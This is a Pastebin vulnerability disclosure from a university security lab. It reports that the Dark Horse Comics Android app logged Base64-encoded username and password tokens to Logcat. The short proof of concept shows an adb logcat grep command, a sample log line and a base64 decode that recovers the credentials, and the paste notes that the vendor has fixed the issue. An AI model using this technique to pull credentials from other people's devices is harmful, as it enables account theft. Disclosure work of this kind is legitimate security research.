Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Title: Dark Horse Comics - Logging Sensitive Information
- # Application: Dark Horse Comics
- # Version: 1.3.21
- # Software Link: https://play.google.com/store/apps/details?id=com.darkhorse.digital
- # Company: Dark Horse Comics
- # Installs: 1,000,000+
- # Impact: hackers can get username and password of Dark Horse Comics, looking at the log.
- # Category: Mobile Apps
- # Tested on: Android 9
- ---Description---
- Dark Horse Comics, the popular comics app installed more than 1 million, stores a user token in Logcat. The user token is the Base64-encoded string from password and username, so by decoding it, hackers can obtain usernames and passwords of the app.
- Especially, in old Android versions prior to Android Jelly Bean, any app installed can access Logcat without any permission.
- ---Vendor feedback---
- After reporting, the vendor has quickly fixed this problem and released a new version.
- ---PoC---
- 1. Try to log in Dark Horse Comics, Android app.
- - Opening Login UI
- - Enter credentials. Fake information is enough for reproducing.
- 2. Search the token in the log
- $ adb logcat | grep 'request with token'
- 09-16 23:44:31.132 13303 14813 V DarkHorse.DungeonHTTPClient: Manually signing HTTP request with token: amFlaG8ubGVlQHJpY2UuZWR1Om15ZmFja3Bhc3N3b3Jk
- 3. Decoding base64 to get a username and password.
- $ base64 -d
- amFlaG8ubGVlQHJpY2UuZWR1Om15ZmFja3Bhc3N3b3Jk
- jaeho.lee@rice.edu:myfackpassword
- --Reporter---
- Jaeho Lee (Jaeho.Lee@rice.edu)
- Rice Computer Security Lab
- Rice University
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement